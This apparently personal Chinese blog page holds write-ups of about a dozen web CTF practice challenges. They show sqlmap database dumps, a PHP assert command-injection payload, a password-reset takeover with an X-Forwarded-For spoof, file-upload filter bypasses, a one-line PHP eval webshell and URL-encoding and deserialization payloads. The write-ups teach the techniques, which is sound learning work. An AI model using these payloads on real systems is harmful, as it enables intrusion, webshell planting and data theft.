<h2 id="NewsCenter"><a href="#NewsCenter" class="headerlink" title="NewsCenter"></a>NewsCenter</h2><h3 id="预备知识-3"><a href="#预备知识-3" class="headerlink" title="预备知识"></a>预备知识</h3><h4 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h4><p>在网页进行表单提交时，将特殊的语句提交到服务器，语句可以是数据库管理的命令，如果服务器端没有对我们提交的表单进行过滤或者过滤的条件不过严格，那么我们的命令便可以在服务器上进行执行。</p>
<p>一般搜索窗口等可能会与服务器进行交互的存在sql注入漏洞的概率较大。</p>
<p><a href="[https://baike.baidu.com/item/sql%E6%B3%A8%E5%85%A5/150289?fr=aladdin](https://baike.baidu.com/item/sql注入/150289?fr=aladdin)">sql注入百度百科</a></p>
<p>一般可以直接使用sqlmap工具，进行一键检测，具体的使用方法，我也是刚接触，留个坑，有时间专门学习一下，在总结。在此放上<a href="https://www.freebuf.com/sectool/164608.html" target="_blank" rel="noopener">别人的总结</a></p>
<h3 id="题解-3"><a href="#题解-3" class="headerlink" title="题解"></a>题解</h3><ul>
<li><p>打开网页，发现了一个search窗口，可能是xss或者sql注入，针对xss尝试了几个简单的语句如：<em>\<script>alert("hey!")\</script></em>之后失败。</p>
</li>
<li><p>接着使用sqlmap，进行自动化检测</p>
<p>首先随便输入几个字母，接着使用burpporject 截获请求头，</p>
<p><img src="https://pic.superbed.cn/item/5d8ecef6451253d178988363.jpg" alt></p>
<p>复制请求头并保存到header.txt</p>
</li>
<li><p>接着利用sqlamp自动化检测，执行</p>
<blockquote>
<p>python2 .\sqlmap.py -r header.txt –bds</p>
</blockquote>
<p><img src="https://ae01.alicdn.com/kf/H523168032d494cffb5262464f52abc1dz.jpg" alt></p>
<p>发现了一个名为news的数据库，这就证明我们成功的进行了sql注入。</p>
<p>接下啦就是要获取到news中的内容</p>
<blockquote>
<p>python2 .\sqlmap.py -r header.txt -D news –dump</p>
</blockquote>
<p>得到flag</p>
<p><img src="https://ae01.alicdn.com/kf/H27559efc44714f55bbc7ed61f5af46508.jpg" alt></p>
</li>
<li><p>答案：QCTF{sq1_inJec7ion_ezzz}</p>
</li>
</ul>
<h3 id="总结-1"><a href="#总结-1" class="headerlink" title="总结"></a>总结</h3><p>以上均为傻瓜操作，具体的实现步骤和内部的过程还要进行深入的学习才能够掌握。</p>
<h2 id="mfw"><a href="#mfw" class="headerlink" title="mfw"></a>mfw</h2><h3 id="预备知识-4"><a href="#预备知识-4" class="headerlink" title="预备知识"></a>预备知识</h3><ul>
<li><p>php中的<code>assert()</code>会将括号里的字符串当作php命令命令来执行，如果命令执行成功就返回true，否则返回false。</p>
</li>
<li><p>.git 泄露</p>
</li>
</ul>
<h3 id="题解-4"><a href="#题解-4" class="headerlink" title="题解"></a>题解</h3><ul>
<li><p>打开网页，点击about，出现了Git字样，作者用到了git, 感觉应该是存在.git泄露，于是尝试访问了一下<a href="http://111.198.29.45:58382/.git/，结果还真是。" target="_blank" rel="noopener">http://111.198.29.45:58382/.git/，结果还真是。</a></p>
</li>
<li><p>用githack吧文件下载下来</p>
<blockquote>
<p>python2 .\GitHack.py <a href="http://111.198.29.45:58382/.git/" target="_blank" rel="noopener">http://111.198.29.45:58382/.git/</a></p>
</blockquote>
</li>
<li><p>审计代码，在index.php里面发现了</p>
<pre class="line-numbers language-javascript"><code class="language-javascript"><span class="token comment" spellcheck="true">// I heard '..' is dangerous!</span>
<span class="token function">assert</span><span class="token punctuation">(</span><span class="token string">"strpos('$file', '..') === false"</span><span class="token punctuation">)</span> or <span class="token function">die</span><span class="token punctuation">(</span><span class="token string">"Detected hacking attempt!"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token comment" spellcheck="true">// TODO: Make this look nice</span>
<span class="token function">assert</span><span class="token punctuation">(</span><span class="token string">"file_exists('$file')"</span><span class="token punctuation">)</span> or <span class="token function">die</span><span class="token punctuation">(</span><span class="token string">"That file doesn't exist!"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>assert 之前也没有别的对file的过滤，于是可以尝试利用assert的漏洞，获取到我们的flag</p>
</li>
<li><p>在我们下载下来的文件中还有templates下的flag.php这个文件，但是打开后是空的，但是还是要尝试看看文件中的内容，毕竟暗示的太明显了</p>
<p>构建payload：<em>?page=abc’) or system(“cat templates/flag.php”);//</em></p>
</li>
<li><p>访问题目网址+payload, 然后查看网页源代码的到flag</p>
<p><img src="https://ae01.alicdn.com/kf/H79ff2cfa08714092a29abeed445e69369.jpg" alt></p>
</li>
<li><p>答案：cyberpeace{d67613f92f5b9db5aa431b01f1cf0d26}</p>
</li>
</ul>
<h2 id="Training-WWW-Robots"><a href="#Training-WWW-Robots" class="headerlink" title="Training-WWW-Robots"></a>Training-WWW-Robots</h2><p>so easy，emmmmm</p>
<ul>
<li>访问网址，查看网站的robots.txt文件，即访问<a href="http://111.198.29.45:42194/robots.txt，" target="_blank" rel="noopener">http://111.198.29.45:42194/robots.txt，</a></li>
<li>发现了有个f10g.php不让爬虫访问，有问题，接着访问<a href="http://111.198.29.45:42194//fl0g.php" target="_blank" rel="noopener">http://111.198.29.45:42194//fl0g.php</a></li>
<li>得到flag： cyberpeace{fa6f80fa63a1c6be3519907c459ee696}</li>
</ul>
<h2 id="NaNNaNNaNNaN-Batman"><a href="#NaNNaNNaNNaN-Batman" class="headerlink" title="NaNNaNNaNNaN-Batman"></a>NaNNaNNaNNaN-Batman</h2><h3 id="预备知识-5"><a href="#预备知识-5" class="headerlink" title="预备知识"></a>预备知识</h3><ul>
<li><p>eval() </p>
<p>JavaScript函数，会将执行字符串中的JavaScript语句。<em>a=”javascript语句”;eval(a);</em></p>
</li>
<li><p>alert()</p>
<p>javascript函数，会将字符串的内容以弹窗的形式显示出来。当我们获取到的文件有编码问题时，一般可以通过此函数将正确的编码的形式显示出来。</p>
</li>
</ul>
<h3 id="题解-5"><a href="#题解-5" class="headerlink" title="题解"></a>题解</h3><ul>
<li><p>下载文件，使用记事本打开，发现时javascript语句，但是呢存在很多乱码。</p>
</li>
<li><p>直接修改文件的后缀名为.html，使用浏览器打开。得到了一个输入框</p>
<p><img src="https://ae01.alicdn.com/kf/H99157d52636f42848bb19cead66513b5E.jpg" alt></p>
</li>
<li><p>在此查看源代码，发现最后有一个eval()函数，应该是用来执行前面字符串变量<code>_</code>中包含的JavaScript命令。但是由于函数中存在乱码，看不出什么东西。</p>
</li>
<li><p>把eval函数改为alert函数，从而将函数的内容以弹窗的形式显示出来。</p>
<p><img src="https://ae01.alicdn.com/kf/H0631fadf7b8c49f5a50f088a4c070628u.jpg" alt></p>
<p>乱码消失，为什么消失呢，看了网上很多的解释，我有对源码与弹窗的代码进行了对比，发现源码中的乱码所代表的是一些JavaScript的命令，如so对应if，我认为应该是浏览器的JavaScript模块特定的编码，当使用浏览器进行解析的时候可以正确的显示对应的字符，而使用普通的编辑器无法解析</p>
<p><img src="https://ae01.alicdn.com/kf/H4857a9c54e584609896883510ad9c970E.jpg" alt></p>
</li>
<li><p>复制代码，对齐进行调整一下</p>
<pre class="line-numbers language-javascript"><code class="language-javascript"><span class="token keyword">function</span> <span class="token function">$</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">{</span>
    <span class="token keyword">var</span> e<span class="token operator">=</span>document<span class="token punctuation">.</span><span class="token function">getElementById</span><span class="token punctuation">(</span><span class="token string">"c"</span><span class="token punctuation">)</span><span class="token punctuation">.</span>value<span class="token punctuation">;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span>e<span class="token punctuation">.</span>length<span class="token operator">==</span><span class="token number">16</span><span class="token punctuation">)</span>
        <span class="token keyword">if</span><span class="token punctuation">(</span>e<span class="token punctuation">.</span><span class="token function">match</span><span class="token punctuation">(</span><span class="token regex">/^be0f23/</span><span class="token punctuation">)</span><span class="token operator">!=</span><span class="token keyword">null</span><span class="token punctuation">)</span>
            <span class="token keyword">if</span><span class="token punctuation">(</span>e<span class="token punctuation">.</span><span class="token function">match</span><span class="token punctuation">(</span><span class="token regex">/233ac/</span><span class="token punctuation">)</span><span class="token operator">!=</span><span class="token keyword">null</span><span class="token punctuation">)</span>
                <span class="token keyword">if</span><span class="token punctuation">(</span>e<span class="token punctuation">.</span><span class="token function">match</span><span class="token punctuation">(</span><span class="token regex">/e98aa$/</span><span class="token punctuation">)</span><span class="token operator">!=</span><span class="token keyword">null</span><span class="token punctuation">)</span>
                    <span class="token keyword">if</span><span class="token punctuation">(</span>e<span class="token punctuation">.</span><span class="token function">match</span><span class="token punctuation">(</span><span class="token regex">/c7be9/</span><span class="token punctuation">)</span><span class="token operator">!=</span><span class="token keyword">null</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
                        <span class="token keyword">var</span> t<span class="token operator">=</span><span class="token punctuation">[</span><span class="token string">"fl"</span><span class="token punctuation">,</span><span class="token string">"s_a"</span><span class="token punctuation">,</span><span class="token string">"i"</span><span class="token punctuation">,</span><span class="token string">"e}"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
                        <span class="token keyword">var</span> n<span class="token operator">=</span><span class="token punctuation">[</span><span class="token string">"a"</span><span class="token punctuation">,</span><span class="token string">"_h0l"</span><span class="token punctuation">,</span><span class="token string">"n"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
                        <span class="token keyword">var</span> r<span class="token operator">=</span><span class="token punctuation">[</span><span class="token string">"g{"</span><span class="token punctuation">,</span><span class="token string">"e"</span><span class="token punctuation">,</span><span class="token string">"_0"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
                        <span class="token keyword">var</span> i<span class="token operator">=</span><span class="token punctuation">[</span><span class="token string">"it'"</span><span class="token punctuation">,</span><span class="token string">"_"</span><span class="token punctuation">,</span><span class="token string">"n"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
                        <span class="token keyword">var</span> s<span class="token operator">=</span><span class="token punctuation">[</span>t<span class="token punctuation">,</span>n<span class="token punctuation">,</span>r<span class="token punctuation">,</span>i<span class="token punctuation">]</span><span class="token punctuation">;</span>
                        <span class="token keyword">for</span><span class="token punctuation">(</span><span class="token keyword">var</span> o<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">;</span>o<span class="token operator">&lt;</span><span class="token number">13</span><span class="token punctuation">;</span><span class="token operator">++</span>o<span class="token punctuation">)</span><span class="token punctuation">{</span>
                            document<span class="token punctuation">.</span><span class="token function">write</span><span class="token punctuation">(</span>s<span class="token punctuation">[</span>o<span class="token operator">%</span><span class="token number">4</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

                            s<span class="token punctuation">[</span>o<span class="token operator">%</span><span class="token number">4</span><span class="token punctuation">]</span><span class="token punctuation">.</span><span class="token function">splice</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span>
                        <span class="token punctuation">}</span>
                    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>

document<span class="token punctuation">.</span><span class="token function">write</span><span class="token punctuation">(</span><span class="token string">'&lt;input id="c">&lt;button onclick=$()>Ok&lt;/button>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">delete</span> _<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>就是对我们输入的字符进行正则匹配，如果都成功了就输出flag。</p>
</li>
<li><p>分析匹配的条件，发现使用<code>be0f233ac7be98aa</code>刚好16个字符，<code>^</code>与<code>&amp;</code>分别对应起始符和终止符不需要我们输入，也不算到长度里面。</p>
</li>
<li><p>输入字符达到答案<code>flag{it&#39;s_a_h0le_in_0ne}</code></p>
</li>
</ul>
<h2 id="bug"><a href="#bug" class="headerlink" title="bug"></a>bug</h2><h3 id="预备知识-6"><a href="#预备知识-6" class="headerlink" title="预备知识"></a>预备知识</h3><ul>
<li><p>文件上传限制绕过</p>
<p>文件在上传时会通过客户端的JavaScript代码对文件的类型进行验证，不符合的会进行报错。</p>
<p>当文件上传到服务器是有时也会对文件类型进行检测，当不符合时会进行报错。</p>
<p><a href="https://www.freebuf.com/articles/web/179954.html" target="_blank" rel="noopener">文件上传限制绕过技巧</a></p>
</li>
</ul>
<h3 id="题解-6"><a href="#题解-6" class="headerlink" title="题解"></a>题解</h3><ul>
<li><p>打开网页，首先注册一个账号</p>
<p><img src="https://ae01.alicdn.com/kf/Ha13159f6382f45a78694618d255d0efa5.jpg" alt></p>
</li>
<li><p>登录之后发现有一个manage页面只有管理员能打开，尝试以管理员登录。</p>
</li>
<li><p>我们在登录界面发现了一个找回密码Findpwd页面，输入我们的信息，点击提交。</p>
<p><img src="https://ae01.alicdn.com/kf/H3dc26b8034c3409eacb9ce824aeeae8ch.jpg" alt></p>
</li>
</ul>
<ul>
<li><p>得到更改密码的页面</p>
<p><img src="https://ae01.alicdn.com/kf/Hf31cdbcb11cb4bbf8682629d4a5fc84ej.jpg" alt></p>
<p>使用burporject拦截，发现了我们提交了用户名和新密码，尝试将用户名更改为admin</p>
<p><img src="https://ae01.alicdn.com/kf/H65319559bc254272a7b8f6225edff4b3N.jpg" alt></p>
<p>username=admin&amp;newpwd=admin，点击放包，显示密码修改成功</p>
</li>
<li><p>以管理登录，再次点击manage页面，显示ip不被允许，那么就使用burporject修改xff为127.0.0.1。</p>
<p><img src="https://ae01.alicdn.com/kf/Hd6034a4964ba4521af9376424aee8b14m.jpg" alt></p>
<p><img src="https://ae01.alicdn.com/kf/H38e866b814844bea9ae32789be59801bS.jpg" alt></p>
<p>得到返回的结果，查看页面源代码，发现了</p>
<pre class="line-numbers language-html"><code class="language-html"><span class="token comment" spellcheck="true">&lt;!-- index.php?module=filemanage&amp;do=???--></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>像是要上传文件，do=upload，访问页面。得到一个上传文件的窗口</p>
</li>
<li><p>显示我们需要上传的是图片，尝试上传一张png文件，结果显示</p>
<p>you know what i want</p>
</li>
<li><p>这就是在考我们的文件上传漏洞的利用了，新建一个txt文件，后缀名改为.png，文件中写入</p>
<pre><code>&lt;script language=&quot;php&quot;&gt;php&lt;/script&gt;</code></pre><p>目的是告诉服务器这是一个php文件，而将后缀名改为.png是为了绕过客户端的检测</p>
</li>
<li><p>提交文件，使用burproject拦截，更改文件名的后缀为.php5，为了绕过服务器的检测，同时保证php文件可以被服务器的php服务运行，Apache服务器会将其视为php文件执行。</p>
<p><img src="https://ae01.alicdn.com/kf/H53f5b73c9b004ce898a66ef651164a01B.jpg" alt></p>
<p>放包的到flag</p>
<p><img src="https://ae01.alicdn.com/kf/Hfba2caf6c80e4cbabedc1196df10d040a.jpg" alt></p>
</li>
<li><p>答案：cyberpeace{e7f0b000f46130efad220c66d77e98e2}</p>
</li>
</ul>
<h3 id="总结-2"><a href="#总结-2" class="headerlink" title="总结"></a>总结</h3><p>对于这种找bug的题要敢于尝试，应当对每个页面都进行审查。</p>
<h2 id="upload"><a href="#upload" class="headerlink" title="upload"></a>upload</h2><h3 id="预备知识-7"><a href="#预备知识-7" class="headerlink" title="预备知识"></a>预备知识</h3><ul>
<li><p>mysql语句奇怪的执行顺序</p>
<p><strong>select database()</strong> 显示当前操作的数据库的名称</p>
<p><strong>select hex(database())</strong> 显示当前操作的数据库的名称字符的16进制格式</p>
<pre class="line-numbers language-mysql"><code class="language-mysql">mysql> select hex(database());
+-----------------+
| hex(database()) |
+-----------------+
| 6C7A73716C      |
+-----------------+
1 row in set (0.01 sec)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><strong>select substr(hex(database()), 1, 8)</strong> 显示当前操作的数据库的名称的16进制格式的前八位</p>
<pre class="line-numbers language-mysql"><code class="language-mysql">mysql> select substr(hex(database()), 1, 8);
+-------------------------------+
| substr(hex(database()), 1, 8) |
+-------------------------------+
| 6C7A7371                      |
+-------------------------------+
1 row in set (0.00 sec)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<blockquote>
<p>总结：mysql语句中关键字的优先级不一样，select database()的优先级最高，其次才是对其操作结果执行的命令，如hex， substr等</p>
</blockquote>
</li>
<li><p><strong>CONV</strong></p>
<p>和hex，substr属于同一类，可嵌套使用，conv(N, G1, G2)，将N从进制G1， 转换到进制G2。</p>
<pre class="line-numbers language-mysql"><code class="language-mysql">mysql> select conv(11, 10, 16);
+------------------+
| conv(11, 10, 16) |
+-----------------+
| B                |
+------------------+
1 row in set (0.00 sec)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
</li>
</ul>
<h3 id="题解-7"><a href="#题解-7" class="headerlink" title="题解"></a>题解</h3><p>最开始我以为文件上传漏洞，找了半天，试了一句话木马都不行，大佬题解救我，由于过程较为冗杂，学习意义不大，在此直接放上大佬的题解。</p>
<p><a href="https://www.cnblogs.com/sharpff/p/10728498.html" target="_blank" rel="noopener">https://www.cnblogs.com/sharpff/p/10728498.html</a></p>
<h2 id="FlatScience"><a href="#FlatScience" class="headerlink" title="FlatScience"></a>FlatScience</h2><h3 id="预备知识-8"><a href="#预备知识-8" class="headerlink" title="预备知识"></a>预备知识</h3><p>sqlite自带的结构表sqlite_master，sql是sqlite_master中的一个字段，注入时经常用到的</p>
<p>union 用于将两个查询语句的结果进行合并，但是一般要求查询的列数相等</p>
<p>limit 可用于指定查询的其实位置和条数，比如limit 0,1 表示从0开始取一个</p>
<h3 id="题解-8"><a href="#题解-8" class="headerlink" title="题解"></a>题解</h3><p><a href="https://blog.csdn.net/zz_Caleb/article/details/89323133" target="_blank" rel="noopener">https://blog.csdn.net/zz_Caleb/article/details/89323133</a></p>
<p>懒得写了，以后有机会再补上吧，放上我自认为别人写的比较好的题解இ௰இ</p>
<h2 id="web2"><a href="#web2" class="headerlink" title="web2"></a>web2</h2><p>这道题其实没什么弯，题目给的很明白，就是给了结果让我们来逆向算法，得到初始值</p>
<ul>
<li><p><a href="https://www.runoob.com/try/runcode.php?filename=demo_intro&type=php" target="_blank" rel="noopener">在线php环境</a> 调用<code>str_rot13</code>进行str_rot13解码与逆序</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token keyword">echo</span> <span class="token function">strrev</span><span class="token punctuation">(</span><span class="token function">str_rot13</span><span class="token punctuation">(</span><span class="token string">"a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
</li>
<li><p>随便找个base64解码的网站进行解码</p>
<pre><code>~88:36e1bg8438e41757d:29cgeb6e48c`GUDTO|;hbmg</code></pre></li>
<li><p>python 逆向编辑函数</p>
<pre class="line-numbers language-python"><code class="language-python">_ <span class="token operator">=</span> <span class="token string">"~88:36e1bg8438e41757d:29cgeb6e48c`GUDTO|;hbmg"</span>
_o <span class="token operator">=</span> <span class="token string">""</span>
<span class="token keyword">while</span> len<span class="token punctuation">(</span>_<span class="token punctuation">)</span><span class="token punctuation">:</span>
    _c <span class="token operator">=</span> _<span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span>
    _ <span class="token operator">=</span> _<span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span>

    __ <span class="token operator">=</span> ord<span class="token punctuation">(</span>_c<span class="token punctuation">)</span>
    _c <span class="token operator">=</span> chr<span class="token punctuation">(</span>__ <span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span>
    _o <span class="token operator">+=</span> _c
<span class="token keyword">print</span><span class="token punctuation">(</span>_o<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>的到flag：flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}</p>
</li>
</ul>
<h2 id="PHP2"><a href="#PHP2" class="headerlink" title="PHP2"></a>PHP2</h2><h3 id="预备知识-9"><a href="#预备知识-9" class="headerlink" title="预备知识"></a>预备知识</h3><p>urldecode()：对已经过url编码的字符串进行解码</p>
<p>常见利用：%2561，首先浏览器一般对其进行解码再传送给服务器%25解码得到%，于是乎传送给服务器的就是%61，服务器端再次利用urldecode()进行解码得到a。可以通过此种方式绕过一些判断。</p>
<h3 id="题解-9"><a href="#题解-9" class="headerlink" title="题解"></a>题解</h3><ul>
<li><p>得到链接，我从下手，看看robots.txt, .git， 没什么发现</p>
</li>
<li><p>尝试url+index.php，得到原来的网页，证明我们访问的就是index.php页面，之不过默认不指出index页面。</p>
</li>
<li><p>题目是php2，尝试url+index.php2，无果，尝试url+index.phps，返回源码（菜鸡的我又被虐到了）</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token operator">===</span><span class="token variable">$_GET</span><span class="token punctuation">[</span>id<span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token keyword">echo</span><span class="token punctuation">(</span><span class="token string">"&lt;p>not allowed!&lt;/p>"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">exit</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>

<span class="token variable">$_GET</span><span class="token punctuation">[</span>id<span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token function">urldecode</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span>id<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span>id<span class="token punctuation">]</span> <span class="token operator">==</span> <span class="token string">"admin"</span><span class="token punctuation">)</span>
<span class="token punctuation">{</span>
  <span class="token keyword">echo</span> <span class="token string">"&lt;p>Access granted!&lt;/p>"</span><span class="token punctuation">;</span>
  <span class="token keyword">echo</span> <span class="token string">"&lt;p>Key: xxxxxxx &lt;/p>"</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token delimiter">?></span>

Can you anthenticate to this website<span class="token operator">?</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
</li>
<li><p>首先要绕过第一个if，并且还有保证字符为admin，并且还利用到了urldecode()</p>
<p>构造payload：url+?id=%2561dmin。得到答案</p>
<pre class="line-numbers language-html"><code class="language-html">http://111.198.29.45:43764/?id=%2561dmin

Access granted!

Key: cyberpeace{11a35d67596e61866c858c6375715e62}

Can you anthenticate to this website?<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
</li>
</ul>
<blockquote>
<p>看书真的有用啊，这个我在web实战中见过，还是要多读书</p>
</blockquote>
<h2 id="unserialize3"><a href="#unserialize3" class="headerlink" title="unserialize3"></a>unserialize3</h2><h3 id="php反序列化漏洞"><a href="#php反序列化漏洞" class="headerlink" title="php反序列化漏洞"></a>php反序列化漏洞</h3><p><a href="https://www.anquanke.com/post/id/159206#h2-1" target="_blank" rel="noopener">四个实例递进php反序列化突破理解</a></p>
<p><a href="https://www.freebuf.com/news/172507.html" target="_blank" rel="noopener">从一道CTF题学习PHP反序列化漏洞</a></p>
<h3 id="题解-10"><a href="#题解-10" class="headerlink" title="题解"></a>题解</h3><ul>
<li><p>把题目给的类进行序列化，构造payload即可</p>
<blockquote>
<p><a href="http://111.198.29.45:39720/?code=O:4:&quot;xctf&quot;:1:{s:4:&quot;flag&quot;;s:2:&quot;111&quot;;}" target="_blank" rel="noopener">http://111.198.29.45:39720/?code=O:4:&quot;xctf&quot;:1:{s:4:&quot;flag&quot;;s:2:&quot;111&quot;;}</a></p>
</blockquote>
</li>
</ul>
<blockquote>
<p>php反序列化还是比较大的一块内容，看来要花一点时间学习一下啦</p>
</blockquote>
<h2 id="upload1"><a href="#upload1" class="headerlink" title="upload1"></a>upload1</h2><p><em>so easy</em></p>
<p>访问网址发现可以上传图片</p>
<p><img src="https://ae01.alicdn.com/kf/Heb6f72f316ff4ca19f3df436c66df7cfn.jpg" alt></p>
<p>居然还返回了一个类似地址的信息 upload/1571474485.C罗.jpg</p>
<p>尝试访问 <a href="http://111.198.29.45:44266/upload/1571474485.C%E7%BD%97.jpg，" target="_blank" rel="noopener">http://111.198.29.45:44266/upload/1571474485.C%E7%BD%97.jpg，</a> 居然可以，证明我们的文件的却是保存到了服务器上并且我们还可以直到在哪里。</p>
<p>尝试上传一句话木马， 创建txt文件写入 <?php eval(@$_POST['a']); ?> 保存为a.php，尝试上传这个文件，结果显示让我们上传一张图片，即存在客户端检测，尝试绕过</p>
<p>更改文件名为a.jpg，在此上传，使用burproject拦截，修改文件名为a.php</p>
<p><img src="https://ae01.alicdn.com/kf/H66f9633928b04215974c7a99f9f471aaA.jpg" alt></p>
<p>得到返回的信息，成功上传一句话木马</p>
<p><img src="https://ae01.alicdn.com/kf/H6fe015d9370e4cceb28d97fb5c5dff03s.jpg" alt></p>
<p>使用中国菜刀连接</p>
<p><img src="https://ae01.alicdn.com/kf/H8a1f4b6034c74870a897916fb30fa9e81.jpg" alt></p>
<p><img src="https://ae01.alicdn.com/kf/Hab6452bb90db4da98fca7d1dc0aad1fcJ.jpg" alt></p>
<p>下载flag.php文件得到答案：cyberpeace{8bfda28e2f87c19cafc9380f62126c31}</p>

            </div>
            <hr />

            
            <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.88rem;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-large waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fa fa-close"></i></a>
            <h4 class="reward-title">写作不易，客官能否打赏一杯奶茶？</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>
            

            <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">

<div id="article-share">
    
    <div class="social-share" data-disabled="qzone" data-wechat-qrcode-helper="<p>微信里点“发现”->“扫一扫”二维码便可查看分享。</p>"></div>
    
</div>

<script src="/libs/share/js/social-share.min.js"></script>

            

    <div class="reprint" id="reprint-statement">
        <p class="reprint-tip">
            <i class="fa fa-exclamation-triangle"></i>&nbsp;&nbsp;
            <span>转载规则</span>
        </p>
        
            <div class="center-align">
                <a rel="license" href="https://creativecommons.org/licenses/by/4.0/deed.zh">
                    <img alt=""
                         style="border-width:0"
                         src="https://i.creativecommons.org/l/by/4.0/88x31.png"/>
                </a>
            </div>
            <br/>
            <span xmlns:dct="http://purl.org/dc/terms/" href="http://purl.org/dc/dcmitype/Text"
                  property="dct:title" rel="dct:type">
                    《攻防世界web进阶》
                </span> 由
            <a xmlns:cc="http://creativecommons.org/ns#" href="/2019/09/25/2019-gong-fang-shi-jie-web-jin-jie/" property="cc:attributionName"
               rel="cc:attributionURL">
                ZS
            </a> 采用
            <a rel="license" href="https://creativecommons.org/licenses/by/4.0/deed.zh">
                知识共享署名 4.0 国际许可协议
            </a>进行许可。
        
    </div>

